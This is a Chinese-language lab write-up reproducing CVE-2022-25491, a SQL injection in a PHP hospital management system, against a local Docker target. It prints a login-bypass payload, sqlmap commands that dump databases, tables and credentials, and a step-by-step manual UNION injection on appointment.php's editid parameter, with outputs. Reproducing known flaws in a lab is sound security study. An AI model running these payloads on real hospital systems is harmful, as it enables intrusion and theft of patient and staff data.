工具准备:
1.Kali
2.Vm虚拟机
3.Docker环境
4.CMS系统概述:
医院管理系统 (HMS) 是一种基于计算机或网络的系统,有助于管理医院或任何医疗机构的运作。该系统或软件将有助于使整个功能无纸化。它将有关患者、医生、员工、医院管理细节等的所有信息集成到一个软件中。它有组成医院的各种专业人员的部分。
环境准备:
1.开启Docker环境
systemctl start docker #手动启动
systemctl enable docker #设置开机自启动2.Docker验证:
docker version #安装验证
systemctl status docker.service #开启服务验证
docker info #验证加速是否生效3.拉取CVE-2022-25491镜像
4.查看镜像文件
使⽤ docker images 查看docker服务器中所有的镜像⽂件
5.启动镜像
6.查看本机IP即可知道靶机url
http://192.168.192.128:8888/
漏洞复现阶段(sqlmap梭哈):
1.打开登录界面:
2.进入登录页面
3.抓包请求,利用万能钥匙绕过
loginid=admin&password=123456987'+or+1=1+--++&submit=Login
4.直接进入后台,发现是SQL注入漏洞
5.抓包请求包,设置为1.txt,并在需要sql注入的地方+*
POST /adminlogin.php HTTP/1.1
Host: 192.168.192.128:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.192.128:8888
Connection: keep-alive
Referer: http://192.168.192.128:8888/adminlogin.php
Cookie: PHPSESSID=5av1rkettgfrkgjl7bakchcvdr; _ga=GA1.1.859320655.1765826294; _gid=GA1.1.1338934917.1765826294; _ga_J1DQF09WZC=GS2.1.s1765826295$o1$g1$t1765826880$j52$l0$h0; _gat=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i
loginid=admin*&password=12345678*&submit=Login6.输入命令,利用sqlmap
sqlmap -r 1.txt
7.利用sqlmap爆破数据库名
sqlmap -r 1.txt --dbs
获取到数据库名:
hms
information_schema
mysql
performance_schema
8.利用sqlmap爆破表名:
sqlmap -r 1.txt -D "hms" --tables
获取到表名
[18 tables]
+----------------------+
| admin |
| user |
| appointment |
| billing |
| billing_records |
| department |
| doctor |
| doctor_timings |
| medicine |
| orders |
| patient |
| payment |
| prescription |
| prescription_records |
| room |
| service_type |
| treatment |
| treatment_records |
+----------------------+
9.利用sqlmap获取user数据表中所有字段名
sqlmap -r 1.txt -D "hms" -T "user" --colums
获取到所有字段名:
[7 columns]
+--------------------+-------------+
| Column | Type |
+--------------------+-------------+
| createddateandtime | datetime |
| email | varchar(50) |
| loginname | varchar(50) |
| mobileno | varchar(15) |
| password | varchar(10) |
| patientname | varchar(50) |
| userid | int(11) |
+--------------------+-------------+
10.利用sqlmap获取loginname、password的数据
sqlmap -r 1.txt -D "hms" -T "user" -C "userid,loginname,password" --dump
获取到loginname、password的数据
[1 entry]
+--------+-----------+----------+
| userid | loginname | password |
+--------+-----------+----------+
| 1 | admin | admin |
+--------+-----------+----------+
漏洞复现阶段(手工注入)
1.打开登录界面:
2.进入登录页面
3.抓包请求,利用万能钥匙绕过
loginid=admin&password=123456987'+or+1=1+--++&submit=Login
4.直接进入后台,发现是SQL注入漏洞
5.通过CVE官网得知,该漏洞位于,appointment.php文件的editid参数。
先访问appointment.php随便输入,发现没有什么变化,添加editid参数
6. 先判断闭合,当输入1,1'--+时正确有回显,1'时报错,说明是单引号闭合。
7. 判断字段:?editid=1' order by 10--+,在10的时候刚好正确。
8. 判断回显位:显示回显位在第十位
?editid=1' union select 1,2,3,4,5,6,7,8,9,10--+
9. 爆破当前连接用户
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,user() --+
root@localhost
10. 爆破当前数据库名
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,database()--+
hms
11. 爆破当前版本信息
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,version()--+
10.3.27-MariaDB-0+deb10u1
12.爆破获取表名:
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,group_concat(table_name) from information_schema.tables where table_schema='hms' --+
treatment_records,payment,user,admin,treatment,doctor,appointment,patient,orders,billing_records,prescription_records,department,prescription,room,service_type,doctor_timings,medicine,billing
13.获取user表下的列名
?editid=0' union select 1,2,3,4,5,6,7,8,9,group_concat(column_name) from information_schema.columns where table_schema='hms' and table_name='user' --+
userid,loginname,password,patientname,mobileno,email,createddateandtime
14.获取数据
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,group_concat(userid,loginname,password) from user --+
1adminadmin
15.但实际上因为后台登录框是限制了8个字符起的,所以输进去也对不上:
再看登录选项发现只有admin/doctor/patient那就在表名里找这三个表的信息,先看admin相关登录信息
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,group_concat(column_name) from information_schema.columns where table_schema='hms' and table_name='admin' --+
adminid,adminname,loginid,password,status,usertype
16.再去看看用户名和密码:
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,group_concat(adminid,adminname,loginid,password,status,usertype) from admin --+
1Kabiradmin123456789Active
17.这里对应的账户密码就是:admin、123456789登进去也没哈利用价值
18.最后看一下版本号就是了:
一看就是Linux系统靶机,当然啦也没办法传马进去。本期CVE漏洞复现就在这里了,整个过程没有任何绕过,sqlmap一跑就出来了